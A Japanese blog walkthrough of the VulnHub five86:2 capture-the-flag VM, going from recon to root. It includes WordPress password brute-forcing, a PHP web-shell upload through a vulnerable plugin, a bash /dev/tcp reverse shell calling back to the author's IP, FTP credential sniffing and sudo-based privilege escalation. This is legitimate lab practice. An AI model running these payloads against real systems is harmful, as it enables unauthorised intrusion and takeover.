vulnhub five86:2のwalkthrough
はじめに
最近vulnhubを始めたので、write-upをメモとして残しておく 挑戦したのはこれ
www.vulnhub.com five86-1はやってないので、今度やる予定
vulnhubの調査に関しては以下を参考にした kakyouim.hatenablog.com
調査
まずは標的のIPアドレスを調査する
sudo netdiscover -r $ip
$ip部はその都度変更(例:192.168.100.0/24)
判明したので、/etc/hostsにfive86-2としておいた
次に、標的を調査する
$ nmap -p- -A -sV five86-2 Host is up (0.0017s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp ProFTPD 1.3.5e 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.1.4 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Five86-2 – Just another WordPress site Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds
ページにアクセスすると、wordpressで作られたページだった とりあえずwpscanを使って、ユーザ名を調査する
$ wpscan --url five86-2 -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.8 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://five86-2/ [+] Started: Fri Feb 28 15:48:56 2020 Interesting Finding(s): [+] http://five86-2/ | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://five86-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://five86-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://five86-2/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://five86-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.1.4 identified (Latest, released on 2019-12-12). | Found By: Rss Generator (Passive Detection) | - http://five86-2/index.php/feed/, <generator>https://wordpress.org/?v=5.1.4</generator> | - http://five86-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.4</generator> [+] WordPress theme in use: twentynineteen | Location: http://five86-2/wp-content/themes/twentynineteen/ | Last Updated: 2020-02-25T00:00:00.000Z | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt | [!] The version is out of date, the latest version is 1.4 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3 | Style Name: Twenty Nineteen | Style URI: https://github.com/WordPress/twentynineteen | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] peter | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] barney | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] gillian | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] stephen | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Fri Feb 28 15:48:59 2020 [+] Requests Done: 58 [+] Cached Requests: 6 [+] Data Sent: 13.343 KB [+] Data Received: 549.372 KB [+] Memory used: 126.762 MB [+] Elapsed time: 00:00:02
ここからどうすればいいかわからなかったので、とりあえずパスワードをクラックできるか試してみた
適当にwordlistをダウンロードした。 user.txtは以下の通り
$ cat user.txt admin gillian peter barney stephen
$ wpscan --url five86-2 -P ./wordlist -U ./user.txt –threads 10 ~~~省略~~~ [SUCCESS] - barney / spooky1 [SUCCESS] - stephen / apollo1
これには結構時間がかかった
barneyとstephenのパスワードがわかったので、wpにログインする http://five86-2/wp-login.php
pluginsを見てみると一つだけactiveになっている
insert or embed articulate content into wordpress trial exploitでググると次のサイトが出てきた www.exploit-db.com
とりあえず以下を実行してZIPファイルを作成する
$ echo "<html>hello</html>" > index.html $ echo "<?php echo system($_GET['cmd']); ?>" > index.php $ zip poc.zip index.html index.php
Pagesからsample pageを編集する 編集画面からe-learningを選択する e-learningを選択すると以下のようにページ下部が変化する uploadからchoose your zip fileを選んで、さっき作ったpoc.zipをアップロードする
設定はいじらずINSERTを押すと、以下のようになる アクセスする http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html
helloと表示されているので、index.htmlとindex.phpが設置できているよう
リバースシェルを張る
$ ncat -lvp 1234
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=%2Fbin%2Fbash -c 'bash -i >%26 %2Fdev%2Ftcp%2F自IP%2F1234 0>%261' としてリバースシェルを張る(自IPを適宜変更)
ここからどうすればいいかよくわからなかったので、wordpressのアカウントでログインできるかやってみた
<-content/uploads/articulate_uploads/poc$ su stephen Password: apollo1 ls index.html index.php
stephenはいけたが、barneyは無理だった
ttyシェルに変更しておく
python3 -c 'import pty; pty.spawn("/bin/sh")'
手がかりがないか調べる
$ id uid=1002(stephen) gid=1002(stephen) groups=1002(stephen),1009(pcap)
$ find / -perm -u=s -type f 2>/dev/null /snap/core/8689/bin/mount /snap/core/8689/bin/ping /snap/core/8689/bin/ping6 /snap/core/8689/bin/su /snap/core/8689/bin/umount /snap/core/8689/usr/bin/chfn /snap/core/8689/usr/bin/chsh /snap/core/8689/usr/bin/gpasswd /snap/core/8689/usr/bin/newgrp /snap/core/8689/usr/bin/passwd /snap/core/8689/usr/bin/sudo /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/8689/usr/lib/openssh/ssh-keysign /snap/core/8689/usr/lib/snapd/snap-confine /snap/core/8689/usr/sbin/pppd /snap/core/8268/bin/mount /snap/core/8268/bin/ping /snap/core/8268/bin/ping6 /snap/core/8268/bin/su /snap/core/8268/bin/umount /snap/core/8268/usr/bin/chfn /snap/core/8268/usr/bin/chsh /snap/core/8268/usr/bin/gpasswd /snap/core/8268/usr/bin/newgrp /snap/core/8268/usr/bin/passwd /snap/core/8268/usr/bin/sudo /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/8268/usr/lib/openssh/ssh-keysign /snap/core/8268/usr/lib/snapd/snap-confine /snap/core/8268/usr/sbin/pppd /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/nc.traditional /usr/bin/at /usr/bin/mount /usr/bin/su /usr/bin/chfn /usr/bin/fusermount /usr/bin/chsh /usr/bin/passwd /usr/bin/umount /usr/bin/sudo /usr/bin/newgrp /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device
$ cd /home $ ls -la total 40 drwxr-xr-x 10 root root 4096 Jan 9 04:49 . drwxr-xr-x 20 root root 4096 Jan 8 22:57 .. drwx------ 2 barney barney 4096 Jan 13 11:19 barney drwx------ 2 george george 4096 Jan 13 11:19 george drwx------ 2 gillian gillian 4096 Jan 13 11:19 gillian drwx------ 2 john john 4096 Jan 13 11:19 john drwx------ 3 paul paul 4096 Jan 13 11:19 paul drwx------ 4 peter peter 4096 Jan 13 11:19 peter drwx------ 2 richard richard 4096 Jan 13 11:19 richard drwx------ 3 stephen stephen 4096 Feb 28 05:27 stephen
わからない...
nmap結果を思い出す
$ nmap -p- -A -sV five86-2 Host is up (0.0017s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp ProFTPD 1.3.5e 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.1.4 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Five86-2 – Just another WordPress site Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds
FTPが動いてる
$ ip address ~~~ 省略~~~ 4: br-eca3858d86bf: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:e9:7c:0d:c8 brd ff:ff:ff:ff:ff:ff inet 172.18.0.1/16 brd 172.18.255.255 scope global br-eca3858d86bf valid_lft forever preferred_lft forever inet6 fe80::42:e9ff:fe7c:dc8/64 scope link valid_lft forever preferred_lft forever 6: veth5661bf0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-eca3858d86bf state UP group default link/ether ae:65:fb:03:f2:93 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet6 fe80::ac65:fbff:fe03:f293/64 scope link valid_lft forever preferred_lft forever
tcpdumpしてみる。
$ timeout 100 tcpdump -w ftp.pcap -i veth5661bf0 tcpdump: listening on veth5661bf0, link-type EN10MB (Ethernet), capture size 262144 bytes 45 packets captured 45 packets received by filter 0 packets dropped by kernel
$ tcpdump -r ftp.pcap tcpdump -r ftp.pcap reading from file ftp.pcap, link-type EN10MB (Ethernet) 05:15:06.660136 IP 172.18.0.10.ftp-data > five86-2.35935: Flags [S], seq 3726234348, win 64240, options [mss 1460,sackOK,TS val 2061727388 ecr 0,nop,wscale 7], length 0 05:15:11.779988 ARP, Request who-has five86-2 tell 172.18.0.10, length 28 05:15:11.780055 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28 05:16:01.411151 IP five86-2.43146 > 172.18.0.10.ftp: Flags [S], seq 1507466548, win 64240, options [mss 1460,sackOK,TS val 1051112056 ecr 0,nop,wscale 7], length 0 05:16:01.411199 IP 172.18.0.10.ftp > five86-2.43146: Flags [S.], seq 2912316704, ack 1507466549, win 65160, options [mss 1460,sackOK,TS val 2061782139 ecr 1051112056,nop,wscale 7], length 0 05:16:01.411242 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 1, win 502, options [nop,nop,TS val 1051112056 ecr 2061782139], length 0 05:16:01.413663 IP 172.18.0.10.32812 > _gateway.domain: 20351+ PTR? 1.0.18.172.in-addr.arpa. (41) 05:16:01.415003 IP _gateway.domain > 172.18.0.10.32812: 20351 NXDomain* 0/0/0 (41) 05:16:01.416604 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 1:58, ack 1, win 510, options [nop,nop,TS val 2061782145 ecr 1051112056], length 57: FTP: 220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10] 05:16:01.416649 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 0 05:16:01.417335 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 1:12, ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 11: FTP: USER paul 05:16:01.417347 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 12, win 510, options [nop,nop,TS val 2061782145 ecr 1051112062], length 0 05:16:01.417777 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 58:90, ack 12, win 510, options [nop,nop,TS val 2061782146 ecr 1051112062], length 32: FTP: 331 Password required for paul 05:16:01.417792 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 0 05:16:01.417864 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 12:33, ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 21: FTP: PASS esomepasswford 05:16:01.417871 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 33, win 510, options [nop,nop,TS val 2061782146 ecr 1051112063], length 0 05:16:01.429785 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 90:115, ack 33, win 510, options [nop,nop,TS val 2061782158 ecr 1051112063], length 25: FTP: 230 User paul logged in 05:16:01.429807 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0 05:16:01.429844 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 33:41, ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 8: FTP: TYPE I 05:16:01.429856 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0 05:16:01.429949 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 115:134, ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 19: FTP: 200 Type set to I 05:16:01.429955 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0 05:16:01.430004 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 41:66, ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 25: FTP: PORT 172,18,0,1,184,215 05:16:01.430015 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0 05:16:01.430123 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 134:163, ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 29: FTP: 200 PORT command successful 05:16:01.430130 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0 05:16:01.430149 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 66:81, ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 15: FTP: STOR file.txt 05:16:01.430158 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 81, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0 05:16:01.430364 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061782158 ecr 0,nop,wscale 7], length 0 05:16:02.436063 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061783164 ecr 0,nop,wscale 7], length 0 05:16:04.452086 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061785180 ecr 0,nop,wscale 7], length 0 05:16:06.564573 ARP, Request who-has 172.18.0.10 tell five86-2, length 28 05:16:06.564543 ARP, Request who-has five86-2 tell 172.18.0.10, length 28 05:16:06.565923 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28 05:16:06.565945 ARP, Reply 172.18.0.10 is-at 02:42:ac:12:00:0a (oui Unknown), length 28 05:16:08.612344 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061789340 ecr 0,nop,wscale 7], length 0 05:16:12.196872 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 3033351166:3033351225, ack 69910674, win 510, options [nop,nop,TS val 2061792925 ecr 1050992285], length 59: FTP: 425 Unable to build data connection: Connection timed out 05:16:12.196978 IP five86-2.43144 > 172.18.0.10.ftp: Flags [.], ack 59, win 502, options [nop,nop,TS val 1051122842 ecr 2061792925], length 0 05:16:12.198035 IP five86-2.43144 > 172.18.0.10.ftp: Flags [P.], seq 1:7, ack 59, win 502, options [nop,nop,TS val 1051122843 ecr 2061792925], length 6: FTP: QUIT 05:16:12.198077 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 7, win 510, options [nop,nop,TS val 2061792926 ecr 1051122843], length 0 05:16:12.198633 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 59:73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 14: FTP: 221 Goodbye. 05:16:12.199019 IP 172.18.0.10.ftp > five86-2.43144: Flags [F.], seq 73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 0 05:16:12.202694 IP five86-2.43144 > 172.18.0.10.ftp: Flags [F.], seq 7, ack 74, win 502, options [nop,nop,TS val 1051122848 ecr 2061792927], length 0 05:16:12.202754 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 8, win 510, options [nop,nop,TS val 2061792931 ecr 1051122848], length 0 05:16:16.803932 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061797532 ecr 0,nop,wscale 7], length 0
paul, esomepasswfordでログインしているようなので
$ su paul su paul Password: esomepasswford
writeupには書いてないけど、いつもやってた下のやつをやった
paul@five86-2:~$ sudo -l Matching Defaults entries for paul on five86-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User paul may run the following commands on five86-2: (peter) NOPASSWD: /usr/sbin/service
peterになれそう
paul@five86-2:/$ sudo -u peter /usr/sbin/service /bin/bash /bin/bash: unrecognized service
無理かも
paul@five86-2:~$ sudo -u peter /usr/sbin/service ../../bin/bash To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. peter@five86-2:/$
いけたけど、上がダメで下がいける理由はわからない。わかる人いたら教えてー
peter@five86-2:/home/peter$ sudo -l Matching Defaults entries for peter on five86-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User peter may run the following commands on five86-2: (ALL : ALL) ALL (root) NOPASSWD: /usr/bin/passwd
rootになれそう
peter@five86-2:/home/peter$ sudo -u root /usr/bin/passwd root New password: root Retype new password: root passwd: password updated successfully
peter@five86-2:/home/peter$ su root Password: root root@five86-2:/home/peter#
rootになれたので、catして終わり
root@five86-2:/home/peter# cd /root cd /root root@five86-2:~# ls ls snap thisistheflag.txt root@five86-2:~# cat thisistheflag.txt
感想
むずかった。もっとごちゃごちゃしてたが、ある程度まとめるとこんな感じでした。数こなせばこのレベルだとスムーズにいけるかも
次はこれかも